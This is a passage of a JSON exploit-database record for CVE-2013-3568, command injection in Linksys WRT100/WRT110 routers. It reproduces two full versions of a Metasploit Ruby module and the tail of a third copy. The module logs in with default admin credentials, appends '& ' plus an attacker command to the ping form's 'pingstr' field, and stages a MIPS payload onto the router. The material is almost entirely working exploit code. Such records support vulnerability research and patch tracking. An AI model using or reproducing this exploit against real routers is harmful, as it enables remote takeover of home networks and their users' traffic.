send_auth_request_cgi({\r\n 'uri' => '/ping.cgi',\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'pingstr' => '& ' + cmd\r\n }\r\n })\r\n\r\n Rex.sleep(1) # Give the device a second\r\n end\r\n\r\n # Helper methods\r\n def user; datastore['USERNAME']; end\r\n def pass; datastore['PASSWORD'] || ''; end\r\n\r\n def send_auth_request_cgi(opts={}, timeout=nil)\r\n timeout ||= datastore['TIMEOUT']\r\n opts.merge!('authorization' => basic_auth(user, pass))\r\n begin\r\n send_request_cgi(opts, timeout)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\r\n end\r\n end\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/28484/"}], "metasploit": [{"lastseen": "2019-11-29T21:09:33", "bulletinFamily": "exploit", "description": "The Linksys WRT100 and WRT110 consumer routers are vulnerable to a command injection exploit in the ping field of the web interface.\n", "modified": "2018-09-15T23:54:45", "published": "2013-10-07T19:06:13", "id": "MSF:EXPLOIT/LINUX/HTTP/LINKSYS_WRT110_CMD_EXEC", "href": "", "type": "metasploit", "title": "Linksys Devices pingstr Remote Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Linksys Devices pingstr Remote Command Injection',\n 'Description' => %q{\n The Linksys WRT100 and WRT110 consumer routers are vulnerable to a command\n injection exploit in the ping field of the web interface.\n },\n 'Author' =>\n [\n 'Craig Young', # Vulnerability discovery\n 'joev', # msf module\n 'juan vazquez' # module help + echo cmd stager\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2013-3568'],\n ['BID', '61151'],\n ['URL', 'https://seclists.org/bugtraq/2013/Jul/78']\n ],\n 'DisclosureDate' => 'Jul 12 2013',\n 'Privileged' => true,\n 'Platform' => ['linux'],\n 'Arch' => ARCH_MIPSLE,\n 'Targets' =>\n [\n ['Linux mipsel Payload', { } ]\n ],\n 'DefaultTarget' => 0,\n ))\n\n register_options([\n OptString.new('HttpUsername', [ true, 'Valid router administrator username', 'admin']),\n OptString.new('HttpPassword', [ true, 'Password to login with', 'admin']),\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\n ])\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')\n end\n\n def check\n begin\n res = send_request_cgi({\n 'uri' => '/HNAP1/'\n })\n rescue ::Rex::ConnectionError\n vprint_error(\"A connection error has occurred\")\n return Exploit::CheckCode::Unknown\n end\n\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n test_login\n\n execute_cmdstager({:flavor => :echo})\n end\n\n # Sends an HTTP request with authorization header to the router\n # Raises an exception unless the login is successful\n def test_login\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\")\n\n res = send_auth_request_cgi({\n 'uri' => '/',\n 'method' => 'GET'\n })\n\n if not res or res.code == 401 or res.code == 404\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\n else\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\n end\n end\n\n # Run the command on the router\n def execute_command(cmd, opts)\n send_auth_request_cgi({\n 'uri' => '/ping.cgi',\n 'method' => 'POST',\n 'vars_post' => {\n 'pingstr' => '& ' + cmd\n }\n })\n\n Rex.sleep(1) # Give the device a second\n end\n\n # Helper methods\n def user\n datastore['HttpUsername']\n end\n\n def pass\n datastore['HttpPassword'] || ''\n end\n\n def send_auth_request_cgi(opts={}, timeout=nil)\n timeout ||= datastore['TIMEOUT']\n opts.merge!('authorization' => basic_auth(user, pass))\n begin\n send_request_cgi(opts, timeout)\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb"}], "zdt": [{"lastseen": "2018-03-19T11:06:05", "bulletinFamily": "exploit", "description": "The Linksys WRT110 consumer router is vulnerable to a command injection exploit in the ping field of the web interface.", "modified": "2013-09-21T00:00:00", "published": "2013-09-21T00:00:00", "id": "1337DAY-ID-21262", "href": "https://0day.today/exploit/description/21262", "type": "zdt", "title": "Linksys WRT110 Remote Command Execution Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStagerEcho\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linksys WRT110 Remote Command Execution',\r\n 'Description' => %q{\r\n The Linksys WRT110 consumer router is vulnerable to a command injection\r\n exploit in the ping field of the web interface.\r\n },\r\n 'Author' =>\r\n [\r\n 'Craig Young', # Vulnerability discovery\r\n 'joev <jvennix[at]rapid7.com>', # msf module\r\n 'juan vazquez' # module help + echo cmd stager\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-3568'],\r\n ['BID', '61151'],\r\n ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']\r\n ],\r\n 'DisclosureDate' => 'Jul 12 2013',\r\n 'Privileged' => true,\r\n 'Platform' => ['linux'],\r\n 'Arch' => ARCH_MIPSLE,\r\n 'Targets' =>\r\n [\r\n ['Linux mipsel Payload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n ))\r\n\r\n register_options([\r\n OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),\r\n OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),\r\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\r\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\r\n ], self.class)\r\n\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/HNAP1/'\r\n })\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n test_login!\r\n\r\n execute_cmdstager\r\n end\r\n\r\n # Sends an HTTP request with authorization header to the router\r\n # Raises an exception unless the login is successful\r\n def test_login!\r\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\")\r\n\r\n res = send_auth_request_cgi({\r\n 'uri' => '/',\r\n 'method' => 'GET'\r\n })\r\n\r\n if not res or res.code == 401 or res.code == 404\r\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\r\n end\r\n end\r\n\r\n # Run the command on the router\r\n def execute_command(cmd, opts)\r\n send_auth_request_cgi({\r\n 'uri' => '/ping.cgi',\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'pingstr' => '& ' + cmd\r\n }\r\n })\r\n\r\n Rex.sleep(1) # Give the device a second\r\n end\r\n\r\n # Helper methods\r\n def user; datastore['USERNAME']; end\r\n def pass; datastore['PASSWORD'] || ''; end\r\n\r\n def send_auth_request_cgi(opts={}, timeout=nil)\r\n timeout ||= datastore['TIMEOUT']\r\n opts.merge!('authorization' => basic_auth(user, pass))\r\n begin\r\n send_request_cgi(opts, timeout)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21262"}]}
